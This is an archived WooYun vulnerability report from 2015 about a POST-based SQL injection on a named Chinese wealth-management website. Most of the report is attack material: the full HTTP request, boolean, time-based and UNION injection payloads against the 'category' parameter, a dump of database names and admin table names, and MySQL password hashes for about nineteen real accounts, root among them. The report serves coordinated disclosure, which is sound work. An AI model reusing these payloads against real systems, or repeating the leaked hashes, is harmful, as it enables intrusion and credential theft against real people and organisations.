乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-05: 细节已通知厂商并且等待厂商处理中 2015-08-06: 厂商已经确认,细节仅向厂商公开 2015-08-16: 细节向核心白帽子及相关领域专家公开 2015-08-26: 细节向普通白帽子公开 2015-09-05: 细节向实习白帽子公开 2015-09-20: 细节向公众公开
test
普益财富主站存在sql注入漏洞,可以获取大量数据库用户敏感信息,和用户密码等信息。
注入连接:http://www.pywm.com.cn:80/issue_product---index.htmlpost型sql注入
POST /issue_product---index.html HTTP/1.1Content-Length: 112Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.pywm.com.cn/Cookie: PHPSESSID=db3fdf2a0148760f152971045d3c2af9; AJSTAT_ok_pages=1; AJSTAT_ok_times=1Host: www.pywm.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*button=%c9%b8%d1%a1&category=1&duration=&issue_way=&sale_state=&start_point=
注入点是category
Parameter: category (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: button=%c9%b8%d1%a1&category=1 AND 9151=9151&duration=&issue_way=&sale_state=&start_point= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: button=%c9%b8%d1%a1&category=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aqky)&duration=&issue_way=&sale_state=&start_point= Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: button=%c9%b8%d1%a1&category=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626271,0x66544c4854435a585251,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &duration=&issue_way=&sale_state=&start_point=
dba权限sql注入
看了一下dbs有43个数据库
[*] bugfree2[*] bugtracker[*] cardinfo[*] cj[*] club[*] cnbene[*] cnbene_address[*] cnbene_data[*] cnbene_product[*] code[*] crm[*] data[*] delete[*] democnbene[*] dotproject[*] fpsale[*] fund_sale_admin[*] gd_noxm[*] gdnx[*] gdnx_develop[*] getbook[*] historical_data_bak[*] hxbbank_data[*] information_schema[*] jishiyu[*] lccp_admin[*] man_crm[*] market[*] member[*] mysql[*] partners_db[*] pms[*] product[*] search_demo[*] session[*] sms[*] soocai[*] terrace[*] test[*] test_cnbene[*] test_crm[*] webadmin[*] webdata
跑了一下webadmin库内的数据
+-----------------------------+| card_dealer_getaccount || card_dealer_info || card_dealer_record || card_self_dealer_getaccount || exam_itempool || exam_question || front_accesscontrol || front_accesscontrol_stock || front_analyst_info || front_answer || front_answer_del || front_article || front_article_class || front_customer_info || front_group || front_group_stock || front_history_comment || front_knowledgebase || front_mydata || front_questions || front_questions_del || front_questions_stock || front_questionstype || front_stocksearchcount || front_visit || productsale_customize || ss_admingroup || ss_admingroup_temp || ss_adminloginlog || ss_adminrights || ss_adminuser || ss_adminuser_temp || ss_uploads |+-----------------------------+
ss_adminuser表中有大量人员的账号和密码信息
还可跑出数据库用户信息,有70个数据库用户
跑出了一部分用户的密码hash
[*] bakuser [1]: password hash: *BEE0AEEF2541F1B630888FE9705FA6F35D03846F[*] cacti_test [1]: password hash: *1A7356A50FA41C99CC8B96FC509420DBB4F5A550[*] check-run [1]: password hash: *6208B34FF096647ABB1338FDFF4F3E2E5ADCFCB2[*] chenlijun_data [1]: password hash: *8E9A7586A36008AE5A8FF253F5E5EDC6A50A24FB[*] cnbene [1]: password hash: *170286FCEE6CEE7035604AB21E4BE1A99D18FFFA[*] datacnbene [1]: password hash: *BEE0AEEF2541F1B630888FE9705FA6F35D03846F[*] dengpeng [1]: password hash: *E7BDEC8B18803668B18A4DF103A67B326C921130[*] fpsale [1]: password hash: *A911D7ADDFE6AAE8CA1B4FA33E28715BE81C9FFC[*] fuyongbin [1]: password hash: *766B1257AC40C18E388EB2EF5E5F8A26BBE46E0D[*] gd_slave_bank [1]: password hash: *F178980EAF6DA3B984225EBBDBCBF19AE291FACC[*] gdnx_data [1]: password hash: *D4058F407F38D172227DEA5545158E2AD3E558CB[*] lccp [1]: password hash: *AC450753C5EA3F15EB732F54C911CE4403518E18[*] man_crm [1]: password hash: *6A64A15419C00B67DCD6E35923CEA04387BC1C07[*] market [1]: password hash: *A0732F1E1515599CE65ACCF72C1B5AF10AB49248[*] pydata [1]: password hash: *CC2CDBCABEA6824335E7489EB726BF8E8F6EF9D4[*] root [1]: password hash: *4C763986C2336568F959B9F71F72DD2EE639F55D[*] search [1]: password hash: *A05B5B0E6C4591DD1101ECF33675320155E4496F[*] source_index [1]: password hash: *B00940FBFEB128CF3A14D8591D89062CA6181008[*] terrace [1]: password hash: *95D7394837DD1E2F21F2472312E33A0F24BD71FF
做好过滤,求高rank。。。发了这么多有没有小礼物啊
危害等级:高
漏洞Rank:15
确认时间:2015-08-06 11:58
感谢
暂无